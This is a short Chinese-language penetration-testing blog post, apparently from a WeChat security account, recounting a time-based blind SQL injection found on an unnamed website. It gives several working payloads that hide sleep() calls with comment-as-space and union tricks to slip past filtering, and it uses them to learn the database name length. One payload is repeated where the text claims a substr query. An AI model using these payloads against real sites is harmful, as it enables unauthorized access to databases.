声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,淮橘安全及文章作者不为此承担任何责任。
现在只对常读和星标的公众号才展示大图推送,建议大家能把“设为星标”,否则可能就看不到了啦!每日为大家推送0day,1day,好用的工具供大家学习
0x01 事情经过
这天收到了领导发来的一个网站,并告知要仔仔细细测试,每一个功能点不能放过,已经开始燃起来了!看来今日份的学习得推迟了,仔细揣摩这个网站,实在没什么功能可测呀,难道要交不出漏洞了吗......
0x02 复现过程
打开网站一筹莫展之际,在源代码发现了一个接口,一股神秘的力量在牵引着我,这个接口看着不简单难不成会有信息泄露
拼接一看,可恶啊,还是太年轻
要放弃了吗?不!这么好看的参数怎么能不试试注入
单引号报错,双数单引号正常显示,这不有盼头了
先丢sqlmap看看,能搞出来我就可以完成任务,继续学习了
不论怎么跑只知道有注入,但是没法利用,难不成是有防护,看来还得手工
既然已经知道是时间盲注了那针对sleep语句先fuzz一下,这不轮子有了
0'and(select*from(select/**/sleep(2))b/**/union/**/select+1)='
至于为什么实际响应的时间会比sleep的时间多一倍,欢迎各位知道的师傅评论留意
之后获取数据库长度为7
0'and(select*from(select/**/if(length(database())=1,sleep(1),sleep(0)))a/**/union/**/select+1)='
substr也能用,那在获取个数据库名吧
0'and(select*from(select/**/if(length(database())=1,sleep(1),sleep(0)))a/**/union/**/select+1)='
好了成功拿下,学习去咯
总结:
不要放弃,相信自己,fuzz出轮子后,一切道路都将通明。
还不会?找师傅一起干。
0x03
原文始发于微信公众号(淮橘安全):【web渗透】sql注入手工注不出?记一次时间盲注
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论